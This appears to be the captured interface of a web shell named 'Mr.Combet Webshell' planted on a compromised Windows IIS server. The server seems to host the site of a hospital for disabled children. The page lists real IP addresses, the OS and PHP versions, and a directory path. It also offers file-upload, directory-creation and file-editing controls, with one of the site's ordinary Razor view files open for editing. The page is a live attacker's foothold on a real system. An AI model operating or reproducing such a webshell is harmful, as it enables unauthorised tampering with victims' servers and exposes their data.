Mr.Combet Webshell
Your IP :
216.73.216.136
Server IP :
103.233.58.157
Server :
Windows NT WIN-4PGF72KEHKB 10.0 build 17763 (Windows Server 2016) AMD64
Server Software :
Microsoft-IIS/10.0
PHP Version :
7.3.25
Add File :
Submit
Add Directory :
Submit
Dir :
C:
/
inetpub
/
wwwroot
/
HRDC
/
HRDC
/
Views
/
OurPrograms
/
Edit File Name :
OurProgramList.cshtml
@model IEnumerable<HRDC.Models.OurProgram> @{ ViewBag.Title = "HRDC-HOSPITAL & REHABILITATION for DISABLED CHILDREN"; Layout = "~/Views/Shared/DetailLayout.cshtml"; } <div class="paragraph-block bottom-margin"> <table class="custom-table-properties"> <thead> <tr> <th></th> </tr> </thead> <tbody> @foreach (var item in Model) { <tr> <td> <hr /> <h4>@item.ProgramTitle</h4> <div class="row"> <div class="col-sm-5 col-xs-12"> <div class="img-list-wrap"> <img src="~/Assets/Images/OurPrograms/@item.ProgramImage" alt=""> </div> </div> <div class="col-sm-7 col-xs-12"> <p>@item.ProgramDescription</p> @Html.ActionLink("Read More", "OurProgramDetail", new { id = item.ProgramID }, new { @class = "btn btn-blue" }) </div> </div> </td> </tr> } </tbody> </table> </div>
Save